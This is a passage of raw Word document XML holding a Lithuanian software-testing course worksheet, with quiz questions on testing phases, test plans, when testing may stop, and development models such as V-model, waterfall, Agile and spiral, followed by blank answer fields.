        <w:t>lėlyje pateiktų testavimo fazių</w:t>
      </w:r>
      <w:r w:rsidR="00D01C7B" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> neišskiria testavimo procesas?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3772AE09" wp14:editId="458B5507">
            <wp:extent cx="5314315" cy="2597150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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14315" cy="2597150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A43EFD" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimo pabaigos (closure)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A43EFD" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Dalykinės srities ir reikalavimų suvokimo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A43EFD" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimo veiklų vykdymo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A43EFD" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testų ir testavimo duomenų paruošimo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008336D0" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kas turi būti įrašyta į testavimo planą?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008336D0" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Darbų grafikas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008336D0" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Funkcionalumas, kuris bus testuojamas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008336D0" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Funkcionalumas, kuris nebus testuojamas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A51372" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimo fazė</w:t>
      </w:r>
      <w:r w:rsidR="008336D0" w:rsidRPr="00AD4464">
        <w:t>s ir veiklos jose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AC60B7" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kada gali būti stabdomas PĮ testavimas?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AC60B7" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kai</w:t>
      </w:r>
      <w:r w:rsidR="00D5034C" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> IS pateikta netestuotina (labai</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> blogos kokybės)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AC60B7" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Kai testavimo </w:t>
      </w:r>
      <w:r w:rsidR="00D5034C" w:rsidRPr="00AD4464">
        <w:t>aplinka nestabili, arba joje trū</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ksta programinių komponentų ar konfigūracijos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AC60B7" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kai programinės įrangos tiekėjas taip nusprendžia</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AC60B7" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kai projekto komanda atsisako dirbti viršvalandžius</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0032209D" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PĮ KŪRIMO MODELIAI IR TESTAVIMO</w:t>
      </w:r>
      <w:r w:rsidR="004A773C" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PROCESAS</w:t>
      </w:r>
      <w:r w:rsidR="00C3696A">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D5034C" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:t>Atsakykite į žemiau pateiktus klausimus. Kiekvie</w:t>
      </w:r>
      <w:r w:rsidR="00C34B97" w:rsidRPr="00AD4464">
        <w:t>nas klausimas gali turėti vieną</w:t>
      </w:r>
      <w:r w:rsidR="004A773C" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> arba daugiau teisingų atsakymų</w:t>
      </w:r>
      <w:r w:rsidR="00C3696A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004A773C" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="009E58DB" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: Suprasti programinės įrangos kūrimo modelio sąvoką. Susipažinti su PĮ kūrimo modeliais ir suprasti skirtumus tarp jų. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BE20ED" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pateiki</w:t>
      </w:r>
      <w:r w:rsidR="00D5034C" w:rsidRPr="00AD4464">
        <w:t>te 3 pagrindinius V-modelio taik</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ymo privalumus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE20ED" w:rsidRPr="00AD4464" w:rsidRDefault="00BE20ED" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>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7"/>
        <w:gridCol w:w="5777"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BE20ED" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3717" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BE20ED" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D49CB82" wp14:editId="6310E529">
                  <wp:extent cx="2160270" cy="1722755"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1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60270" cy="1722755"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5777" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00BE20ED" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Atsakymas:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00001357" w:rsidRPr="00AD4464" w:rsidRDefault="00001357" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F36086" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Para</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>šykite, kokiems projektams tinka krioklio modelis i</w:t>
      </w:r>
      <w:r w:rsidR="004A773C" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>r kokie yra jo privalumai ir trū</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kumai IS testavimo atžvilgiu?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036A0E" w:rsidRPr="00AD4464" w:rsidRDefault="00036A0E" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>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2"/>
        <w:gridCol w:w="5777"/>
      </w:tblGrid>
      <w:tr w:rsidR="00001357" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3717" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00001357" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A3432CF" wp14:editId="5F8DEBAA">
                  <wp:extent cx="2226310" cy="1576705"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="19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26310" cy="1576705"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5777" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00001357" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Atsakymas:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00001357" w:rsidRPr="00AD4464" w:rsidRDefault="00001357" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E7467B" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Koks modelis yra pateiktas paveikslėlyje? Kokiems projektams jis tinka?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7467B" w:rsidRPr="00AD4464" w:rsidRDefault="00E7467B" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>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725"/>
      </w:tblGrid>
      <w:tr w:rsidR="00886E64" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:trHeight w:val="2861"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00E7467B" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6296C900" wp14:editId="4DA9E296">
                  <wp:extent cx="2000885" cy="1338580"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="19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00885" cy="1338580"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5725" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00E7467B" w:rsidRPr="00AD4464" w:rsidRDefault="00886E64" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Atsakymas:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003413C7" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Kokias grėsmes testavimui </w:t>
      </w:r>
      <w:r w:rsidR="00D5034C" w:rsidRPr="00AD4464">
        <w:t>matote Agile modelyje? Pagrįskit</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>e.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003413C7" w:rsidRPr="00AD4464" w:rsidRDefault="003413C7" w:rsidP="00372B3A">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5725"/>
      </w:tblGrid>
      <w:tr w:rsidR="003413C7" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:trHeight w:val="2861"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003413C7" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09666951" wp14:editId="38E2ED37">
                  <wp:extent cx="2133600" cy="1471295"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="19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33600" cy="1471295"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5725" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003413C7" w:rsidRPr="00AD4464" w:rsidRDefault="003413C7" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Atsakymas:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003B2C2A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Kuris iš pateiktų PĮ kūrimo modelių yra palankiausias testavimui </w:t>
      </w:r>
      <w:r w:rsidR="009C59EC" w:rsidRPr="00AD4464">
        <w:t>dokumentacijos ir reikalavimų atžvilgiu?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009C59EC" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Krioklio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009C59EC" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Iteracinis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009C59EC" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Agile (Judrusis)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009C59EC" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Spiralinis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00FC2C23" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Jei turime pusmečio trukmės projektą, </w:t>
      </w:r>
      <w:r w:rsidR="00B64315" w:rsidRPr="00AD4464">
        <w:t>kurį</w:t>
      </w:r>
      <w:r w:rsidR="00D5034C" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> PĮ kūrimo modelį</w:t>
      </w:r>
      <w:r w:rsidR="00A05C27" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> turėtume rinktis?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A05C27" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Agile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A05C27" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Spiralinį</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A05C27" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>V-modelį</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A05C27" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kriok</w:t>
      </w:r>
      <w:r w:rsidR="00D5034C" w:rsidRPr="00AD4464">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>io</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
